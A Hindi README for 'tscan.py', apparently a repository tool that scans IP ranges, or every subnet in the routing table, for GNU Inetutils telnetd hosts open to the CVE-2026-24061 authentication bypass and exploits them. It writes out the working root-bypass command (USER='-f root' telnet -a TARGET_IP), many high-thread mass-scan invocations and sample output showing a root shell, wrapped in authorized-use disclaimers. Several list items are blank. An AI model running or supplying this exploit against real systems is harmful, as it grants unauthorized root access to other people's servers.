
# Python-आधारित स्कैनर जो CVE-2026-24061 telnetd प्रमाणीकरण बायपास का पता लगाता है और उसका शोषण करता है, जिससे कमजोर GNU Inetutils सेवाओं पर रूट शेल एक्सेस सक्षम होता है।
GNU Inetutils telnetd सेवाओं में CVE-2026-24061 भेद्यता का पता लगाने और उसका शोषण करने के लिए एक Python-आधारित स्कैनर। यह टूल IP पते या नेटवर्क को स्कैन करता है ताकि कमजोर telnetd सेवाओं का पता लगाया जा सके जो प्रमाणीकरण बाईपास की अनुमति देती हैं और रूट शेल एक्सेस प्रदान करती हैं।
यह सॉफ़्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
यह एप्लिकेशन केवल शैक्षिक उद्देश्यों के लिए विकसित किया गया है ताकि सुरक्षा भेद्यताओं का प्रदर्शन किया जा सके और अधिकृत सुरक्षा परीक्षण और अनुसंधान में सहायता मिल सके।
यह सॉफ़्टवेयर "जैसा है" प्रदान किया गया है, बिना किसी प्रकार की वारंटी के, व्यक्त या निहित, जिसमें व्यापारिकता, किसी विशेष उद्देश्य के लिए उपयुक्तता और गैर-उल्लंघन की वारंटी शामिल है लेकिन इन्हीं तक सीमित नहीं है। लेखक और योगदानकर्ता गारंटी नहीं देते कि सॉफ़्टवेयर त्रुटि-मुक्त, सुरक्षित या कार्यात्मक होगा। सॉफ़्टवेयर में बग, त्रुटियाँ या अन्य दोष हो सकते हैं।
इस सॉफ़्टवेयर के उपयोग की सभी ज़िम्मेदारी और दायित्व पूरी तरह से उपयोगकर्ता पर है। इस सॉफ़्टवेयर के लेखक, योगदानकर्ता और वितरक इस सॉफ़्टवेयर के उपयोग, दुरुपयोग या उपयोग करने में असमर्थता से उत्पन्न किसी भी क्षति, हानि या कानूनी परिणामों के लिए उत्तरदायी नहीं होंगे।
इस टूल का उपयोग केवल उन सिस्टमों पर किया जाना चाहिए जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है और इसके परिणामस्वरूप आपराधिक अभियोजन हो सकता है।
लेखक नहीं गारंटी देते:
इस सॉफ़्टवेयर का उपयोग करके, आप स्वीकार करते हैं कि आपने इन शर्तों को पढ़ा, समझा और उनसे बंधे रहने के लिए सहमत हैं। यदि आप सहमत नहीं हैं, तो इस सॉफ़्टवेयर का उपयोग न करें।
द्वारा विकसित: Cuma KURT
ईमेल: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/
CVE-2026-24061: GNU Inetutils telnetd संस्करण 2.7 तक USER पर्यावरण चर के लिए -f root मान के माध्यम से दूरस्थ प्रमाणीकरण बाईपास की अनुमति देता है।
CVSS स्कोर: 9.8 (गंभीर)
संदर्भ: NVD CVE-2026-24061
telnet क्लाइंट (आमतौर पर Linux/macOS पर पहले से इंस्टॉल होता है)pip3 install -r requirements.txt
नोट: अधिकांश निर्भरताएँ Python मानक पुस्तकालय का हिस्सा हैं। यह टूल Python 3.6+ के साथ तुरंत काम करता है।
# एकल IP पते को स्कैन करें
python3 tscan.py 192.168.1.1
# CIDR नेटवर्क को स्कैन करें
python3 tscan.py 192.168.1.0/24
# कस्टम पोर्ट के साथ स्कैन करें
python3 tscan.py -p 2323 192.168.1.1
# फ़ाइल से लक्ष्यों को स्कैन करें
python3 tscan.py targets.txt
# कई IP पतों को स्कैन करें
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# कई CIDR नेटवर्क को स्कैन करें
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
# तेज़ स्कैनिंग के लिए थ्रेड गणना बढ़ाएँ (100 थ्रेड)
python3 tscan.py -t 100 192.168.1.0/24
# धीमे नेटवर्क के लिए टाइमआउट बढ़ाएँ
python3 tscan.py --timeout 10 192.168.1.0/24
# बड़े नेटवर्क स्कैन के लिए दोनों को संयोजित करें
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
# सिस्टम रूटिंग टेबल से सभी सबनेट का स्वचालित रूप से पता लगाएं और स्कैन करें
python3 tscan.py --auto
# या छोटा रूप उपयोग करें:
python3 tscan.py -a
# कस्टम पोर्ट के साथ स्वचालित पहचान
python3 tscan.py --auto -p 2323
# या:
python3 tscan.py -a -p 2323
# उच्च थ्रेड गणना के साथ स्वचालित पहचान
python3 tscan.py --auto -t 200
# या:
python3 tscan.py -a -t 200
नोट: --auto मोड ip route list या route -n कमांड का उपयोग करके सिस्टम रूटिंग टेबल पढ़ता है और सभी पहचाने गए सबनेट को स्वचालित रूप से स्कैन करता है।
# उदाहरण 1: स्थानीय नेटवर्क का त्वरित स्कैन
python3 tscan.py 192.168.1.0/24
# उदाहरण 2: उच्च समवर्तीता के साथ तेज़ स्कैन
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# उदाहरण 3: गैर-मानक telnet पोर्ट को स्कैन करें
python3 tscan.py -p 2323 192.168.1.0/24
# उदाहरण 4: सभी स्थानीय नेटवर्क सबनेट का स्वचालित रूप से पता लगाएं और स्कैन करें
python3 tscan.py --auto
# या:
python3 tscan.py -a
# उदाहरण 5: कस्टम सेटिंग्स के साथ स्वचालित पहचान
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# या:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
positional arguments:
targets IP पता(पते), CIDR नेटवर्क, या लक्ष्यों वाले फ़ाइल पथ
options:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
-p, --port PORT स्कैन करने के लिए Telnet पोर्ट (डिफ़ॉल्ट: 23)
-t, --threads THREADS समवर्ती थ्रेड की संख्या (डिफ़ॉल्ट: 50)
--timeout TIMEOUT सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 5)
-v, --verbose विस्तृत आउटपुट
-a, --auto सिस्टम रूटिंग टेबल से सभी सबनेट का स्वचालित रूप से पता लगाएं और स्कैन करें (route -n या ip route list)
एक टेक्स्ट फ़ाइल बनाएं जिसमें प्रति पंक्ति एक लक्ष्य हो:
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
# से शुरू होने वाली पंक्तियाँ टिप्पणियों के रूप में मानी जाती हैं और अनदेखा की जाती हैं।
यह टूल प्रदान करता है:
रीयल-टाइम प्रगति: परिणाम खोजे जाने पर दिखाता है
[!] - कमजोर होस्ट[~] - पोर्ट खुला लेकिन कमजोर नहींसारांश रिपोर्ट: इसमें शामिल है:
[*] 256 लक्ष्यों पर स्कैन शुरू...
[*] पोर्ट: 23, थ्रेड: 50, टाइमआउट: 5s
[*] प्रगति: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | खुले: 2 | कमजोर: 1
[!] 192.168.1.100:23 - कमजोर
[*] प्रगति: [████████████████████████████████████] 100.0% (256/256) | खुले: 3 | कमजोर: 1
[+] स्कैन पूर्ण: 256/256 लक्ष्य स्कैन किए गए
======================================================================
स्कैन परिणाम सारांश
======================================================================
पाई गई Telnet सेवाएँ: 3
कमजोर होस्ट: 1
[!] कमजोर होस्ट:
● 192.168.1.100:23
आउटपुट: uid=0(root) gid=0(root) groups=0(root)...
[~] पाई गई Telnet सेवाएँ लेकिन कमजोर नहीं:
● 192.168.1.101:23
● 192.168.1.102:23
[*] स्कैन 12.34 सेकंड में पूर्ण हुआ
USER="-f root" पर्यावरण चर सेट करता हैtelnet -a कमांड के माध्यम से कनेक्ट करता हैयह भेद्यता USER पर्यावरण चर को -f root पर सेट करके प्रमाणीकरण बाईपास की अनुमति देती है:
USER="-f root" telnet -a TARGET_IP [PORT]
यह telnetd को USER चर को एक फ्लैग के रूप में व्याख्या करने का कारण बनता है, प्रमाणीकरण को बाईपास करता है और रूट एक्सेस प्रदान करता है।
telnet क्लाइंट इंस्टॉल होना आवश्यक हैip route list या route -n कमांड की आवश्यकता होती हैtelnet क्लाइंट इंस्टॉल करें:
# Debian/Ubuntu
sudo apt-get install telnet
# CentOS/RHEL
sudo yum install telnet
# macOS
# आमतौर पर पहले से इंस्टॉल होता है
--timeout 10यह टूल निम्नलिखित के लिए है:
इस टूल का उपयोग न करें:
यह प्रोग्राम मुफ्त सॉफ़्टवेयर है: आप इसे फ्री सॉफ़्टवेयर फाउंडेशन द्वारा प्रकाशित GNU जनरल पब्लिक लाइसेंस की शर्तों के तहत, लाइसेंस के संस्करण 3 या (आपकी पसंद पर) किसी भी बाद के संस्करण के तहत पुनर्वितरित और/या संशोधित कर सकते हैं।
यह प्रोग्राम इस उम्मीद में वितरित किया जाता है कि यह उपयोगी होगा, लेकिन बिना किसी वारंटी के; यहां तक कि व्यापारिकता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटी के बिना भी। अधिक विवरण के लिए GNU जनरल पब्लिक लाइसेंस देखें।
आपको इस प्रोग्राम के साथ GNU जनरल पब्लिक लाइसेंस की एक प्रति प्राप्त होनी चाहिए। यदि नहीं, तो https://www.gnu.org/licenses/ देखें।
पूर्ण GNU जनरल पब्लिक लाइसेंस v3.0 पाठ के लिए LICENSE फ़ाइल देखें।
लेखक और योगदानकर्ता इस टूल के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं।
यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
अपने जोखिम पर उपयोग करें। इस सॉफ़्टवेयर के उपयोग की सभी ज़िम्मेदारी और दायित्व पूरी तरह से उपयोगकर्ता पर है। लेखक इस सॉफ़्टवेयर की सटीकता, सुरक्षा या कार्यक्षमता की गारंटी नहीं देते। सॉफ़्टवेयर बिना किसी प्रकार की वारंटी के "जैसा है" प्रदान किया गया है।
यह एप्लिकेशन केवल शैक्षिक उद्देश्यों के लिए विकसित किया गया है। इस सॉफ़्टवेयर का उपयोग करके, आप स्वीकार करते हैं कि:
यदि आप इन शर्तों से सहमत नहीं हैं, तो इस सॉफ़्टवेयर का उपयोग न करें।